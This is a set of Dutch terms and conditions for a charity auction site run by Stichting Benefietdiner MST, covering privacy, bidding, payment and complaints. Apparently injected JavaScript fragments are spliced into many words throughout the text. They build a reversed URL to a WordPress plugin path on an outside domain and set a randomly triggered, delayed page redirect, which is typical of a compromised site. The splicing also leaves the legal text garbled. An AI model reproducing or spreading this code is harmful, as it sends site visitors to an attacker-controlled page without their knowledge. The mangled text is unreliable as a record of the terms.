Algemene voorwaarden

Versie: janutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ari 2023

1. Transparantie veilingen en privacybeleid

 1. Ons veilingproces is eerlijk en zo transparant mogelijk. Heb je vragen, neem dan contact met ons op.
 2. We verkopen je persoonsgegevens niet. Je persoonsgegevens blijven bij ons en delen we niet met willekeurige derden zonder jouw toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toestemming.
 3. We gebruiken je e-mailadres om je te laten weten of je hebt gewonnen. Wil je je gegevens inzien of wijzigen, of geen nieuws meer van ons ontvangen? Dan kun je dat via je gebruikersaccount op ieder moment instellen.
 4. Voor de beveiliging van je persoonsgegevens hebben we technische en organisatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torische maatregelen genomen.

Heb je vragen over ons privacybeleid? Neem dan contact met ons op.

2. Veilingaanbod

 1. Ons aanbod op de veilingsite bevat een zo nauwkeurig mogelijke omschrijving van de aangeboden producten, arrangementen of diensten. Eventuele vergissingen of fouten in omschrijving van het aanbod en/of in de getoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toonde afbeeldingen, zijn niet bindend en leiden niet toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot aansprakelijkheid voor Stichting Benefietdiner MST. Mochten er problemen zijn, neem dan contact met ons op.
 2. Prijzen staan niet vast, maar variëren als gevolg van het veilingproces. De uiteindelijke prijs wordt bepaald door het winnende bod.

3. Annuleren, bedenktermijn niet van toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toepassing

 1. Wanneer je het winnende bod hebt uitgebracht en dat bod op de veilingsite wordt aanvaard, kan de in dat kader toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}totstandgekomen overeenkomst (transactie) NIET geannuleerd of herroepen worden. Dat geldt ook voor aanbod met een vaste prijs.

4. Betaling

 1. Na het winnen van de veiling ontvang je een e-mail met daarin een bevestiging en instructies voor de betaling. De betaling moet middels overboeking worden voldaan.
 2. Je moet een gewonnen veiling binnen zeven (7) dagen betalen.
 3. Betaal je niet binnen de termijn van zeven (7) dagen, dan ben je van rechtswege in verzuim. Via e-mail zullen we je nogmaals opnieuw verzoeken om te betalen.

5. Na betaling

 1. Na betaling van je gewonnen veiling, nemen wij zo snel mogelijk contact met je op om ervoor te zorgen dat het gewonnen item zo snel mogelijk bij je is.
 2. Eventuele bezorgkosten komen voor de rekening van de bieder die verzoekt toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot bezorging.

6. Klachten

 1. Wij doen ons best het bieden zo leuk mogelijk te maken. Heb je toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toch een klacht over onze diensten, neem dan snel contact met ons op. Wij helpen je graag.